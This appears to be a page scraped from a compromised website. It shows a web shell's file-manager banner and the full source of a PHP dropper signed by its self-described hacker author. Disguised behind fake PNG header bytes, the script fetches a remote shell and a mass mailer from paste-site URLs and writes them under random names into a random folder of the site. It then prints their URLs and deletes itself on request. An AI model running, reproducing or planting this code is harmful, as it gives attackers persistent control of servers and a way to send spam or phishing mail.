\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /var/www/html/deka.com.tr/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : /var/www/html/deka.com.tr/myfilexxx.php |
<?php
# Coded By s911 HaCkEr
function Domain(){
$protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https' : 'http';
$host = $_SERVER['HTTP_HOST'];
$hostUrl = $protocol . '://' . $host;
return $hostUrl;
}
function generateRandomName($length = 8) {
$characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$randomName = '';
for ($i = 0; $i < $length; $i++) {
$randomName .= $characters[random_int(0, strlen($characters) - 1)];
}
return $randomName;
}
$hostdomain = Domain();
$currentDirectory = dirname(__FILE__);
$folders = array_filter(glob($currentDirectory . '/*'), 'is_dir');
$randomNameFileshell = generateRandomName(8) . '.php';
$randomNameFilemailer = generateRandomName(7) . '.php';
if (empty($folders)) {
die('No Folder there ');
} else {
$randomFolders = $folders[array_rand($folders)];
$parts_folder = explode('/', $randomFolders);
$randomFolderName = end($parts_folder);
$randomFolderPath = $currentDirectory . '/' . $randomFolderName ;
$shellPath = $randomFolderPath . '/'. $randomNameFileshell;
$contet_shell = file_get_contents('https://www.pastery.net/wjcwsm/raw/');
file_put_contents($shellPath, $contet_shell);
$mailerPath = $randomFolderPath . '/'. $randomNameFilemailer;
$contet_mailer = file_get_contents('https://www.pastery.net/vktqyd/raw/');
file_put_contents($mailerPath, $contet_mailer);
$urlshell = $hostdomain . '/' .$randomFolderName .'/'.$randomNameFileshell;
$urlmailer = $hostdomain . '/' .$randomFolderName .'/'.$randomNameFilemailer;
echo "shell -------> : <b><shell>$urlshell</shell></b></br>";
echo "Mailer ------>:<b><mailer>$urlmailer</mailer></b></br>";
}
if(isset($_GET['unback'])){
unlink(__FILE__);
}
?>